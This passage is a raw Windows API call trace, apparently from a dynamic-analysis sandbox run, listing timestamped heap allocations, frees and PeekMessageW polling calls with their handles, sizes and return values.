(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.491] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.493] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.494] HeapFree (in: 